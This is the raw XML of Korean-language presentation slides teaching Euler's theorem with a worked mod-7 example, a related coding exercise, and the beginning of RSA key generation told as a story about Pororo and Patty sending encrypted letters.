              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>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오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 정리를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1885730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921911"/>
            <a:ext cx="10515600" cy="4578171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>m </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3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3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a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>과 서로소가 되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>보다 작은 양의 정수를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>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a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>번에서 출력했던 수 들의 곱을 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>으로 받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>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2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exit</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를 입력 받았을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프로그래밍을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startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>번에서 출력했던 정수들의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>를 곱하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>, m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>modular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>을 취해준 값을 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startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>번에서 출력했던 수 들의 곱을 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>번으로 돌아간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="제목 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92887E07-1D87-44E2-BF4D-68A8A7509917}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B7CEE7-6EA0-48F6-8E77-9C5AC588009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12672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제목 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DADE75AE-61B8-4855-9D70-0C80F6A467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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC14894-288C-4BEE-BAEB-016B7335EBB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3DD84C83-99D3-49D7-A18B-EE3743697720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2208324"/>
            <a:ext cx="10611793" cy="3027223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379722498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 증명</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139390-90DA-4D1F-B4D5-BA9FF3D74D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380872" y="4224041"/>
            <a:ext cx="9082130" cy="2268833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>ex) m = 7 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>1 * 2 * 3 * 4 * 5 * 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>(1*a) * (2*a) * (3*a) * (4*a) * (5*a) * (6*a)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>1 * 2 * 3 * 4 * 5 * 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>1 * 2 * 3 * 4 * 5 * 6 * a ^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>a ^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9006ADB7-4553-420D-95A4-632C89F87A00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380872" y="1705157"/>
            <a:ext cx="9082130" cy="2373676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>-&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>왜 순서만 바뀌고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>같은 집합이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>나올까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, k1 ) = 1 , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, k2 ) = 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, a ) = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>일때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>만약  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>K1 * a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> K2 * a  (mod m) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>이라면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>, K1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> K2   (mod m) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>이여야</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> 함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>또한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, K1 * a )  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>또한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>이 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>. -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>같은 집합 일 수밖에 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167937411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02E6D75-CF60-4E60-8C18-51B36DE78E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121758" y="1990641"/>
            <a:ext cx="9948484" cy="4388062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>뽀로로와 패티가 비밀연애를 위해 암호화된 연애편지를 주고 받으려 한다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>뽀로로와 패티는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 서로 다른 두 소수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(P, Q)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 선택한다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P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 곱해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  (N=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PxQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 피 함수에 해당되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>φ(N) = (P-1)(Q-1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 구한다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φ(N) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다는 작으면서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>φ(N)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 서로소인 정수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  (1 &lt; e &lt; φ(N)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이번 알고리즘에서는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e = 10001(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 고정한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
